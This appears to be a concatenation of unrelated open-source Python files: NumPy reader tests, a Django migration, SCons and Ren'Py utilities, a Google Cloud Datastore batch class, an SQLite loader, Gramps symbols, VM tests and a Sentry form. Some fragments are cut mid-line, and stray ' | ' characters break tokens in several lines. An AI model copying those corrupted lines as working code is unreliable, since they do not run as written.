chunks = np.vstack(chunks)
np.testing.assert_equal(chunks, self.d[lag::stride])
def test_lagged_stridden_access_multiple_files(self):
reader = NumPyFileReader(self.files2d)
print reader.trajectory_lengths()
s | trides = [2, 3, 5, 7, 15]
lags = [1, 3, 7, 10, 30]
for stride in strides:
for lag in lags:
chunks = {i: [] for i in xrange(reader.number_of_trajectories())}
for itraj, _, Y in reader.iterator(stride, lag):
chunks[itraj].append(Y)
for i, k in enumerate(chunks.itervalues()):
stack = np.vstack(k)
d = np.load(self.files2d[i])
np.testing.assert_equal(stack, d[lag::stride],
"not equal for stride=%i"
" and lag=%i" % (stride, lag))
if __name__ == "__main__":
unittest.main()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2016-11-03 08:56
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('snapventure', '0004_auto_20161102_2043'),
]
operations = [
migrations.CreateModel(
name='Inscription',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('created', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('journey', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='snapventure.Journey')),
],
),
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('bio', models.TextField(blank=True, max_length=500)),
('location', models.CharField(blank=True, max_length=30)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddField(
model_name='inscription',
name='user',
field=models.ForeignKey(on_delete=dj | ango.db.models.deletion.CASCADE, to='snapventure.Profile'),
),
migrations.AddField(
model_name='journey',
name='inscriptio | ns',
field=models.ManyToManyField(through='snapventure.Inscription', to='snapventure.Profile'),
),
]
|
#
# Copyright (c) 2001 - 2014 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
__revision__ = "src/engine/SCons/Scanner/Dir.py 2014/09/27 12:51:43 garyo"
import SCons.Node.FS
| import SCons.Scanner
def only_dirs(nodes):
is_Dir = lambda n: isinstance(n.disambiguate(), SCons.Node.FS.Dir)
return list(filter(is_Dir, nodes))
def DirScanner(**kw):
"""Return a prototype Scanner instance for scanning
directories for on-disk files"""
kw['node_factory'] = SCons.Node.FS.Entry
kw['recursive'] = only_dirs
return SCons.Scanner.Base(scan_on_disk, "DirScanner", **kw)
def DirEntryScanner(**kw):
"""Return a protot | ype Scanner instance for "scanning"
directory Nodes for their in-memory entries"""
kw['node_factory'] = SCons.Node.FS.Entry
kw['recursive'] = None
return SCons.Scanner.Base(scan_in_memory, "DirEntryScanner", **kw)
skip_entry = {}
skip_entry_list = [
'.',
'..',
'.sconsign',
# Used by the native dblite.py module.
'.sconsign.dblite',
# Used by dbm and dumbdbm.
'.sconsign.dir',
# Used by dbm.
'.sconsign.pag',
# Used by dumbdbm.
'.sconsign.dat',
'.sconsign.bak',
# Used by some dbm emulations using Berkeley DB.
'.sconsign.db',
]
for skip in skip_entry_list:
skip_entry[skip] = 1
skip_entry[SCons.Node.FS._my_normcase(skip)] = 1
do_not_scan = lambda k: k not in skip_entry
def scan_on_disk(node, env, path=()):
"""
Scans a directory for on-disk files and directories therein.
Looking up the entries will add these to the in-memory Node tree
representation of the file system, so all we have to do is just
that and then call the in-memory scanning function.
"""
try:
flist = node.fs.listdir(node.abspath)
except (IOError, OSError):
return []
e = node.Entry
for f in filter(do_not_scan, flist):
# Add ./ to the beginning of the file name so if it begins with a
# '#' we don't look it up relative to the top-level directory.
e('./' + f)
return scan_in_memory(node, env, path)
def scan_in_memory(node, env, path=()):
"""
"Scans" a Node.FS.Dir for its in-memory entries.
"""
try:
entries = node.entries
except AttributeError:
# It's not a Node.FS.Dir (or doesn't look enough like one for
# our purposes), which can happen if a target list containing
# mixed Node types (Dirs and Files, for example) has a Dir as
# the first entry.
return []
entry_list = sorted(filter(do_not_scan, list(entries.keys())))
return [entries[n] for n in entry_list]
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
ED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import renpy
import codecs
import os
import os.path
import time
image_prefixes = None
filenames = None
# Things to check in lint.
#
# Image files exist, and are of the right case.
# Jump/Call targets defined.
# Say whos can evaluate.
# Call followed by say.
# Show/Scene valid.
# At valid.
# With valid.
# Hide maybe valid.
# Expressions can compile.
# The node the report will be about:
report_node = None
# Reports a message to the user.
def report(msg, *args):
if report_node:
out = u"%s:%d " % (renpy.parser.unicode_filename(report_node.filename), report_node.linenumber)
else:
out = ""
out += msg % args
print
print out.encode('utf-8')
added = { }
# Reports additional information about a message, the first time it
# occurs.
def add(msg):
if not msg in added:
added[msg] = True
print unicode(msg).encode('utf-8')
# Trys to evaluate an expression, announcing an error if it fails.
def try_eval(where, expr, additional=None):
try:
renpy.python.py_eval(expr)
except:
report( "Could not evaluate '%s', in %s.", expr, where)
if additional:
add(additional)
# Returns True of the expression can be compiled as python, False
# otherwise.
def try_compile(where, expr):
try:
renpy.python.py_compile_eval_bytecode(expr)
except:
report("'%s' could not be compiled as a python expression, %s.", expr, where)
# This reports an error if we're sure that the image with the given name
# does not exist.
def image_exists(name, expression, tag):
# Add the tag to the set of known tags.
tag = tag or name[0]
image_prefixes[tag] = True
if expression:
return
name = list(name)
names = " ".join(name)
while name:
if tuple(name) in renpy.exports.images:
return
name.pop()
report("The image named '%s' was not declared.", names)
# Only check each file once.
check_file_cache = { }
def check_file(what, fn):
present = check_file_cache.get(fn, None)
if present is True:
return
if present is False:
report("%s uses file '%s', which is not loadable.", what.capitalize(), fn)
return
if not renpy.loader.loadable(fn):
report("%s uses file '%s', which is not loadable.", what.capitalize(), fn)
check_file_cache[fn] = False
return
check_file_cache[fn] = True
try:
renpy.loader.transfn(fn)
except:
return
if renpy.loader.transfn(fn) and \
fn.lower() in filenames and \
fn != filenames[fn.lower()]:
report("Filename case mismatch for %s. '%s' was used in the script, but '%s' was found on disk.", what, fn, filenames[fn.lower()])
add("Case mismatches can lead to problems on Mac, Linux/Unix, and when archiving images. To fix them, either rename the file on disk, or the filename use in the script.")
def check_displayable(what, d):
files = [ ]
def files_callback(img):
files.extend(img.predict_files())
d.predict(files_callback)
for fn in files:
check_file(what, fn)
# Lints ast.Image nodes.
def check_image(node):
name = " ".join(node.imgname)
check_displayable('image %s' % name, renpy.exports.images[node.imgname])
def imspec(t):
if len(t) == 3:
return t[0], None, None, t[1], t[2], 0
if len(t) == 6:
return t[0], t[1], t[2], t[3], t[4], t[5], None
else:
return t
# Lints ast.Show and ast.Scene nodets.
def check_show(node):
# A Scene may have an empty imspec.
if not node.imspec:
return
name, expression, tag, at_list, layer, zorder, behind = imspec(node.imspec)
|
if layer not in renpy.config.layers and layer not in renpy.config.top_layers:
report("Uses layer '%s', which is not in config.layers.", layer)
image_exists(name, expression, tag)
for i in at_list:
try_eval("the at list of a scene or show statment", i, "Perhaps you forgot to declare, or misspelled, a position?")
# Lints ast.Hide.
def check_hide(node):
name, expression, tag, at_list, layer, zorder, b | ehind = imspec(node.imspec)
tag = tag or name[0]
if layer not in renpy.config.layers and layer not in renpy.config.top_layers:
report("Uses layer '%s', which is not in config.layers.", layer)
if tag not in image_prefixes:
report("The image tag '%s' is not the prefix of a declared image, nor was it used in a show statement before this hide statement.", tag)
# for i in at_list:
# try_eval(node, "at list of hide statment", i)
def check_with(node):
try_eval("a with statement or clause", node.expr, "Perhaps you forgot to declare, or misspelled, a transition?")
def check_user(node):
def error(msg):
report("%s", msg)
renpy.exports.push_error_handler(error)
try:
node.call("lint")
finally:
renpy.exports.pop_error_handler()
try:
node.get_next()
except:
report("Didn't properly report what the next statement should be.")
check_text_tags = renpy.display.text.check_text_tags
def text_checks(s):
msg = renpy.display.text.check_text_tags(s)
if msg:
report("%s (in %s)", msg, repr(s)[1:])
if "%" in s:
state = 0
pos = 0
fmt = ""
while pos < len(s):
c = s[pos]
pos += 1
# Not in a format.
if state == 0:
if c == "%":
state = 1
fmt = "%"
# In a format.
elif state == 1:
fmt += c
if c == "(":
state = 2
elif c in "#0123456780- +hlL":
state = 1
elif c in "diouxXeEfFgGcrs%":
state = 0
else:
report("Unknown string format code '%s' (in %s)", fmt, repr(s)[1:])
state = 0
# In a mapping key.
elif state == 2:
fmt += c
if c == ")":
state = 1
if state != 0:
report("Unterminated string format code '%s' (in %s)", fmt, repr(s)[1:])
def check_say(node):
if node.who:
try_eval("the who part of a say statement", node.who, "Perhaps you forgot to declare a character?")
if node.with_:
try_eval("the with clause of a say statement", node.with_, "Perhaps you forgot to declare, or misspelled, a transition?")
text_checks(node.what)
def check_menu(node):
if node.with_:
try_eval("the with clause of a menu statement", node.with_, "Perhaps you forgot to declare, or misspelled, a transition?")
if not [ (l, c, b) for l, c, b in node.items if b ]:
report("The menu does not contain any selectable choices.")
for l, c, b in node.items:
if c:
try_compile("in the if clause of a menuitem", c)
text_checks(l)
def check_jump(node):
if node.expression:
return
if not renpy.game.script.has_label(node.target):
report("The jump is to nonexistent label '%s'.", node.target)
def check_call(node):
# if not isinstance(node.next.name, basestring):
# report(node, "The call does not have a from clause associated with it.")
# add("You can add from c |
he License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# Se | e the License for the specific language governing permissions and
# limitations under the License.
"""Create | / interact with a batch of updates / deletes.
Batches provide the ability to execute multiple operations
in a single request to the Cloud Datastore API.
See
https://cloud.google.com/datastore/docs/concepts/entities#batch_operations
"""
from google.cloud.datastore import helpers
from google.cloud.datastore_v1.proto import datastore_pb2 as _datastore_pb2
class Batch(object):
"""An abstraction representing a collected group of updates / deletes.
Used to build up a bulk mutation.
For example, the following snippet of code will put the two ``save``
operations and the ``delete`` operation into the same mutation, and send
them to the server in a single API request::
>>> from google.cloud import datastore
>>> client = datastore.Client()
>>> batch = client.batch()
>>> batch.begin()
>>> batch.put(entity1)
>>> batch.put(entity2)
>>> batch.delete(key3)
>>> batch.commit()
You can also use a batch as a context manager, in which case
:meth:`commit` will be called automatically if its block exits without
raising an exception::
>>> with batch:
... batch.put(entity1)
... batch.put(entity2)
... batch.delete(key3)
By default, no updates will be sent if the block exits with an error::
>>> with batch:
... do_some_work(batch)
... raise Exception() # rolls back
:type client: :class:`google.cloud.datastore.client.Client`
:param client: The client used to connect to datastore.
"""
_id = None # "protected" attribute, always None for non-transactions
_INITIAL = 0
"""Enum value for _INITIAL status of batch/transaction."""
_IN_PROGRESS = 1
"""Enum value for _IN_PROGRESS status of batch/transaction."""
_ABORTED = 2
"""Enum value for _ABORTED status of batch/transaction."""
_FINISHED = 3
"""Enum value for _FINISHED status of batch/transaction."""
def __init__(self, client):
self._client = client
self._mutations = []
self._partial_key_entities = []
self._status = self._INITIAL
def current(self):
"""Return the topmost batch / transaction, or None."""
return self._client.current_batch
@property
def project(self):
"""Getter for project in which the batch will run.
:rtype: :class:`str`
:returns: The project in which the batch will run.
"""
return self._client.project
@property
def namespace(self):
"""Getter for namespace in which the batch will run.
:rtype: :class:`str`
:returns: The namespace in which the batch will run.
"""
return self._client.namespace
def _add_partial_key_entity_pb(self):
"""Adds a new mutation for an entity with a partial key.
:rtype: :class:`.entity_pb2.Entity`
:returns: The newly created entity protobuf that will be
updated and sent with a commit.
"""
new_mutation = _datastore_pb2.Mutation()
self._mutations.append(new_mutation)
return new_mutation.insert
def _add_complete_key_entity_pb(self):
"""Adds a new mutation for an entity with a completed key.
:rtype: :class:`.entity_pb2.Entity`
:returns: The newly created entity protobuf that will be
updated and sent with a commit.
"""
# We use ``upsert`` for entities with completed keys, rather than
# ``insert`` or ``update``, in order not to create race conditions
# based on prior existence / removal of the entity.
new_mutation = _datastore_pb2.Mutation()
self._mutations.append(new_mutation)
return new_mutation.upsert
def _add_delete_key_pb(self):
"""Adds a new mutation for a key to be deleted.
:rtype: :class:`.entity_pb2.Key`
:returns: The newly created key protobuf that will be
deleted when sent with a commit.
"""
new_mutation = _datastore_pb2.Mutation()
self._mutations.append(new_mutation)
return new_mutation.delete
@property
def mutations(self):
"""Getter for the changes accumulated by this batch.
Every batch is committed with a single commit request containing all
the work to be done as mutations. Inside a batch, calling :meth:`put`
with an entity, or :meth:`delete` with a key, builds up the request by
adding a new mutation. This getter returns the protobuf that has been
built-up so far.
:rtype: iterable
:returns: The list of :class:`.datastore_pb2.Mutation`
protobufs to be sent in the commit request.
"""
return self._mutations
def put(self, entity):
"""Remember an entity's state to be saved during :meth:`commit`.
.. note::
Any existing properties for the entity will be replaced by those
currently set on this instance. Already-stored properties which do
not correspond to keys set on this instance will be removed from
the datastore.
.. note::
Property values which are "text" ('unicode' in Python2, 'str' in
Python3) map to 'string_value' in the datastore; values which are
"bytes" ('str' in Python2, 'bytes' in Python3) map to 'blob_value'.
When an entity has a partial key, calling :meth:`commit` sends it as
an ``insert`` mutation and the key is completed. On return,
the key for the ``entity`` passed in is updated to match the key ID
assigned by the server.
:type entity: :class:`google.cloud.datastore.entity.Entity`
:param entity: the entity to be saved.
:raises: :class:`~exceptions.ValueError` if the batch is not in
progress, if entity has no key assigned, or if the key's
``project`` does not match ours.
"""
if self._status != self._IN_PROGRESS:
raise ValueError("Batch must be in progress to put()")
if entity.key is None:
raise ValueError("Entity must have a key")
if self.project != entity.key.project:
raise ValueError("Key must be from same project as batch")
if entity.key.is_partial:
entity_pb = self._add_partial_key_entity_pb()
self._partial_key_entities.append(entity)
else:
entity_pb = self._add_complete_key_entity_pb()
_assign_entity_to_pb(entity_pb, entity)
def delete(self, key):
"""Remember a key to be deleted during :meth:`commit`.
:type key: :class:`google.cloud.datastore.key.Key`
:param key: the key to be deleted.
:raises: :class:`~exceptions.ValueError` if the batch is not in
progress, if key is not complete, or if the key's
``project`` does not match ours.
"""
if self._status != self._IN_PROGRESS:
raise ValueError("Batch must be in progress to delete()")
if key.is_partial:
raise ValueError("Key must be complete")
if self.project != key.project:
raise ValueError("Key must be from same project as batch")
key_pb = key.to_protobuf()
self._add_delete_key_pb().CopyFrom(key_pb)
def begin(self):
"""Begins a batch.
This method is called automatically when entering a with
statement, however it can be called explicitly if you don't want
to use a context manager.
Overridden by :class:`google.cloud.datastore.tra |
# NEVER DO THIS IN SQL!
from Repository.Loader import Loader, LoaderException
from Domain import Grade, Student, Discipline
import sqlite3
class SQLLoader(Loader):
def __init__(self, repo):
self.repo = repo
self.conn = sqlite3.connect(self.repo.getStoragePath() + ".sqlite")
self.cursor = self.conn.cursor()
def save(self):
# serializable = {'students': [], 'disciplines': [], 'grades': []}
self.cursor.execute('''DROP TABLE IF EXISTS students;''')
self.cursor.execute('''DROP TABLE IF EXISTS disciplines;''')
self.cursor.execute('''DROP TABLE IF EXISTS grades;''')
# eww
self.cursor.execute('''CREATE TABLE students (id int, name text)''')
self.cursor.execute('''CREATE TABLE disciplines (id int, name text)''')
self.cursor.execute('''CREATE TABLE grades (did int, sid int, grade int)''')
serializable = {
'students': [(student.getId(), student.getName()) for student in self.repo.getStudents()],
'disciplines': [(discipline.getId(), discipline.getName()) for discipline in
self.repo.getDisciplines()],
'grades': [(grade.getDisciplineId(), grade.getStudentId(), grade.getGrade()) for grade in
self.repo.getGrades()]}
self.cursor.executemany('INSERT INTO students VALUES (?,?)', serializable['students'])
self.cursor.executemany('INSERT INTO disciplines VALUES (?,?)', serializable['disciplines'])
self.cursor.executemany('INSERT INTO grades VALUES (?,?,?)', seriali | zable['grades'])
self.conn.commit()
def load(self):
try:
self.repo._createNewRepo()
for row in self.cursor.execute('SELECT * FROM students'):
| self.repo.addStudent(Student.Student(row[0], row[1]), False)
for row in self.cursor.execute('SELECT * FROM disciplines'):
self.repo.addDiscipline(Discipline.Discipline(row[0], row[1]), False)
for row in self.cursor.execute('SELECT * FROM grades'):
self.repo.addGrade(Grade.Grade(row[0], row[1], row[2]), False)
return True
except Exception as ex:
print('[StudentRepository]', ex)
return False
# eval studentCatalogController._repo._converter(0)
|
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2015- Serge Noiraud
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public Lic | ense as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public Licens | e for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# https://en.wikipedia.org/wiki/Miscellaneous_Symbols
# http://www.w3schools.com/charsets/ref_utf_symbols.asp
#
#-------------------------------------------------------------------------
#
# Standard python modules
#
#-------------------------------------------------------------------------
from gramps.gen.const import GRAMPS_LOCALE as glocale
from gramps.gen.config import config
_ = glocale.translation.sgettext
# pylint: disable=superfluous-parens
# pylint: disable=anomalous-unicode-escape-in-string
class Symbols(object):
# genealogical symbols
SYMBOL_FEMALE = 0
SYMBOL_MALE = 1
SYMBOL_ASEXUAL_SEXLESS = 2 # Unknown
SYMBOL_LESBIAN = 3
SYMBOL_MALE_HOMOSEXUAL = 4
SYMBOL_HETEROSEXUAL = 5
SYMBOL_HERMAPHRODITE = 6
SYMBOL_TRANSGENDER = 7
SYMBOL_NEUTER = 8
SYMBOL_ILLEGITIM = 9
SYMBOL_BIRTH = 10
SYMBOL_BAPTISM = 11 # CHRISTENING
SYMBOL_ENGAGED = 12
SYMBOL_MARRIAGE = 13
SYMBOL_DIVORCE = 14
SYMBOL_UNMARRIED_PARTNERSHIP = 15
SYMBOL_BURIED = 16
SYMBOL_CREMATED = 17 # Funeral urn
SYMBOL_KILLED_IN_ACTION = 18
SYMBOL_EXTINCT = 19
# genealogical death symbols
DEATH_SYMBOL_NONE = 0
DEATH_SYMBOL_X = 1
DEATH_SYMBOL_SKULL = 2
DEATH_SYMBOL_ANKH = 3
DEATH_SYMBOL_ORTHODOX_CROSS = 4
DEATH_SYMBOL_CHI_RHO = 5
DEATH_SYMBOL_LORRAINE_CROSS = 6
DEATH_SYMBOL_JERUSALEM_CROSS = 7
DEATH_SYMBOL_STAR_CRESCENT = 8
DEATH_SYMBOL_WEST_SYRIAC_CROSS = 9
DEATH_SYMBOL_EAST_SYRIAC_CROSS = 10
DEATH_SYMBOL_HEAVY_GREEK_CROSS = 11
DEATH_SYMBOL_LATIN_CROSS = 12
DEATH_SYMBOL_SHADOWED_LATIN_CROSS = 13
DEATH_SYMBOL_MALTESE_CROSS = 14
DEATH_SYMBOL_STAR_OF_DAVID = 15
DEATH_SYMBOL_DEAD = 16
def __init__(self):
self.symbols = None
self.all_symbols = [
# Name UNICODE SUBSTITUTION
(_("Female"), '\u2640', ""),
(_("Male"), '\u2642', ""),
(_("Asexuality, sexless, genderless"), '\u26aa', ""),
(_("Lesbianism"), '\u26a2', ""),
(_("Male homosexuality"), '\u26a3', ""),
(_("Heterosexuality"), '\u26a4', ""),
(_("Transgender, hermaphrodite (in entomology)"), '\u26a5', ""),
(_("Transgender"), '\u26a6', ""),
(_("Neuter"), '\u26b2', ""),
(_("Illegitimate"), '\u229b', ""),
(_("Birth"), '\u002a', config.get('utf8.birth-symbol')),
(_("Baptism/Christening"), '\u007e',
config.get('utf8.baptism-symbol')),
(_("Engaged"), '\u26ac', config.get('utf8.engaged-symbol')),
(_("Marriage"), '\u26ad', config.get('utf8.marriage-symbol')),
(_("Divorce"), '\u26ae', config.get('utf8.divorce-symbol')),
(_("Unmarried partnership"), '\u26af',
config.get('utf8.partner-symbol')),
(_("Buried"), '\u26b0', config.get('utf8.buried-symbol')),
(_("Cremated/Funeral urn"), '\u26b1',
config.get('utf8.cremated-symbol')),
(_("Killed in action"), '\u2694', config.get('utf8.killed-symbol')),
(_("Extinct"), '\u2021', "")]
# The following is used in the global preferences in the display tab.
# Name UNICODE SUBSTITUTION
self.death_symbols = [(_("Nothing"), "", ""),
("x", "x", "x"),
(_("Skull and crossbones"), "\u2620",
config.get('utf8.dead-symbol')),
(_("Ankh"), "\u2625",
config.get('utf8.dead-symbol')),
(_("Orthodox cross"), "\u2626",
config.get('utf8.dead-symbol')),
(_("Chi rho"), "\u2627",
config.get('utf8.dead-symbol')),
(_("Cross of Lorraine"), "\u2628",
config.get('utf8.dead-symbol')),
(_("Cross of Jerusalem"), "\u2629",
config.get('utf8.dead-symbol')),
(_("Star and crescent"), "\u262a",
config.get('utf8.dead-symbol')),
(_("West Syriac cross"), "\u2670",
config.get('utf8.dead-symbol')),
(_("East Syriac cross"), "\u2671",
config.get('utf8.dead-symbol')),
(_("Heavy Greek cross"), "\u271a",
config.get('utf8.dead-symbol')),
(_("Latin cross"), "\u271d",
config.get('utf8.dead-symbol')),
(_("Shadowed White Latin cross"), "\u271e",
config.get('utf8.dead-symbol')),
(_("Maltese cross"), "\u2720",
config.get('utf8.dead-symbol')),
(_("Star of David"), "\u2721",
config.get('utf8.dead-symbol')),
(_("Dead"), ("Dead"), _("Dead"))]
#
# functions for general symbols
#
def get_symbol_for_html(self, symbol):
""" return the html string like '⚪' """
return '&#%d;' % ord(self.all_symbols[symbol][1])
def get_symbol_name(self, symbol):
"""
Return the name of the symbol.
"""
return self.all_symbols[symbol][0]
def get_symbol_for_string(self, symbol):
""" return the utf-8 character like '\u2670' """
return self.all_symbols[symbol][1]
def get_symbol_fallback(self, symbol):
"""
Return the replacement string.
This is used if the utf-8 symbol in not present within a font.
"""
return self.all_symbols[symbol][2]
#
# functions for death symbols
#
def get_death_symbols(self):
"""
Return the list of death symbols.
This is used in the global preference to choose which symbol we'll use.
"""
return self.death_symbols
def get_death_symbol_name(self, symbol):
"""
Return the name of the symbol.
"""
return self.death_symbols[symbol][0]
def get_death_symbol_for_html(self, symbol):
"""
return the html string like '⚪'.
"""
return '&#%d;' % ord(self.death_symbols[symbol][1])
def get_death_symbol_for_char(self, symbol):
"""
Return the utf-8 character for the symbol.
"""
return self.death_symbols[symbol][1]
def get_death_symbol_fallback(self, symbol):
"""
Return the string replacement for the symbol.
"""
return self.death_symbols[symbol][2]
#
# functions for all symbols
#
def get_how_many_symbols(self):
return len(self.death_symbols) + len(self.all_symbols) - 4
|
import sys
sys.path.insert(0, "../")
import unittest
from dip.typesystem import DNull, DBool, DInteger, DString, DList
from dip.compiler import BytecodeCompiler
from dip.interpreter import VirtualMachine
from dip.namespace import Namespace
class TestInterpreter(unittest.TestCase):
def _execute_simple(self, code, data):
result = [None]
def getresult(val):
result[0] = val
vm = VirtualMachine([], getresult)
globalns = Namespace("globals")
ctx = BytecodeCompiler("main", code, data, namespace=globalns)
globalns.set_func("main", ctx.mkfunc())
vm.setglobals(globalns)
vm.run(pass_argv=False)
return result[0]
def test_add(self):
result = self._execute_simple("""
ADD 0 1 2 # 0
RET 2 # 1
""", [
DInteger.new_int(32), # data0
DInteger.new_int(64), # data1
DInteger(), # data2
])
self.assertEqual(result.int_py(), 96)
def test_sub(self):
result = self._execute_simple("""
SUB 0 1 2 # 0
RET 2 # 1
""", [
DInteger.new_int(64), # data0
DInteger.new_int(32), # data1
DInteger(), # data2
])
self.assertEqual(result.int_py(), 32)
def test_mul(self):
result = self._execute_simple("""
MUL 0 1 2 # 0
RET 2 # 1
""", [
DInteger.new_int(64), # data0
DInteger.new_int(32), # data1
DInteger(), # data2
])
self.assertEqual(result.int_py(), 2048)
def test_div(self):
result = self._execute_simple("""
DIV 0 1 2 # 0
RET 2 # 1
""", [
DInteger.new_int(64), # data0
DInteger.new_int(2), # data1
DInteger(), # data2
])
self.assertEqual(result.int_py(), 32)
def test_jump(self):
result = self._execute_simple("""
JMP 2 # 0
RET 0 # 1
RET 1 # 2
""", [
DInteger.new_int(16), # data0
DInteger.new_int(32), # data1
])
self.assertEqual(result.int_py(), 32)
def test_len(self):
result = self._execute_simple("""
LEN 0 1 # 0
RET 1 # 1
""", [
DString.new_str("neat"), # data0
DInteger(), # data1
])
self.assertEqual(result.int_py(), 4)
def test_eq(self):
result = self._execute_simple("""
EQ 0 1 2 # 0
RET 2 # 1
""", [
DInteger.new_int(4), # data0
DInteger.new_int(5), # data1
DBool(), # data2
])
self.assertEqual(result.int_py(), False)
result = self._execute_simple("""
EQ 0 1 2 # 0
RET 2 # 1
""", [
DString.new_str("neat"), # data0
DString.new_str("neat"), # data1
DBool(), # data2
])
self.assertEqual(result.int_py(), True)
def test_branch(self):
result = self._execute_simple("""
EQ 0 1 2 # 0
BF 2 3 # 1
RET 0 # 2
LABEL :some_label # 3
RET 3 # 4
""", [
DInteger.new_int(4), # data0
D | Integer.new_int(5), # data1
DBool(), # data2
DInteger.new_int(999), # data3
])
self.assertEqual(result.int_py(), 999)
def test_lists(self):
result = self._execute_simple("""
LIST_NEW 0
LIST_ADD 0 1 # 0 data0.append(data1)
LIST_ADD 0 1 # 1 data0.append(data1)
LIST_ADD 0 2 # 2 data0. | append(data2)
LEN 0 3 # 3 data3 = len(data0)
EQ 3 5 6 # 4 data6 = (data3 == data5)
LIST_REM 0 4 # 5 data0.remove(data4 (represents an index))
LEN 0 3 # 6 data3 = len(data0)
NEQ 3 5 7 # 7 data7 = (data3 != data5)
EQ 6 7 8 # 8 data8 = (data6 == data7)
RET 8 # 9 return data8
""", [
DList(), # data0, list
DInteger.new_int(5), # data1, fake value to add to the list
DString.new_str("hi"), # data2, fake value to add to the list
DInteger(), # data3, list length
DInteger.new_int(2), # data4, list index
DInteger.new_int(3), # data5, expected list length
DBool(), # data6, comp1
DBool(), # data7, comp2
DBool(), # data8, output
])
self.assertEqual(result.int_py(), True)
if __name__ == '__main__':
unittest.main() |
rom being stored for new events.'),
required=False
)
# JavaScript options
scrape_javascript = forms.BooleanField(
label=_('Enable JavaScript source fetching'),
help_text=_('Allow Sentry to scrape missing JavaScript source context when possible.'),
required=False,
)
# Options that are overridden by Organization level settings
org_overrides = ('scrub_data', 'scrub_defaults', 'scrub_ip_address')
default_environment = forms.CharField(
label=_('Default Environment'),
help_text=_('The default selected environment when viewing issues.'),
widget=forms.TextInput(attrs={'placeholder': _('e.g. production')}),
required=False,
)
mail_subject_prefix = forms.CharField(
label=_('Subject Prefix'),
required=False,
help_text=_('Choose a custom prefix for emails from this project.')
)
class Meta:
fields = ('name', 'team', 'slug')
model = Project
def __init__(self, request, organization, team_list, data, instance, *args, **kwargs):
# First, we need to check for the value overrides from the Organization options
# We need to do this before `initial` gets passed into the Form.
disabled = []
if 'initial' in kwargs:
for opt in self.org_overrides:
value = bool(organization.get_option('sentry:require_%s' % (opt, ), False))
if value:
disabled.append(opt)
kwargs['initial'][opt] = value
super(EditProjectForm, self).__init__(data=data, instance=instance, *args, **kwargs)
self.organization = organization
self.team_list = team_list
self.fields['team'].choices = self.get_team_choices(team_list, instance.team)
self.fields['team'].widget.choices = self.fields['team'].choices
# After the Form is initialized, we now need to disable the fields that have been
# overridden from Organization options.
for opt in disabled:
self.fields[opt].widget.attrs['disabled'] = 'disabled'
def get_team_label(self, team):
return '%s (%s)' % (team.name, team.slug)
def get_team_choices(self, team_list, default=None):
sorted_team_list = sorted(team_list, key=lambda x: x.name)
choices = []
for team in sorted_team_list:
# TODO: optimize queries
choices.append((team.id, self.get_team_label(team)))
if default is None:
choices.insert(0, (-1, mark_safe('–' * 8)))
elif default not in sorted_team_list:
choices.insert(0, (default.id, self.get_team_label(default)))
return choices
def clean_sensitive_fields(self):
value = self.cleaned_data.get('sensitive_fields')
if not value:
return
return filter(bool, (v.lower().strip() for v in value.split('\n')))
def clean_safe_fields(self):
value = self.cleaned_data.get('safe_fields')
if not value:
return
return filter(bool, (v.lower().strip() for v in value.split('\n')))
def clean_team(self):
value = self.cleaned_data.get('team')
if not value:
return
# TODO: why is this not already an int?
value = int(value)
if value == -1:
return
if self.instance.team and value == self.instance.team.id:
return self.instance.team
for team in self.team_list:
if value == team.id:
return team
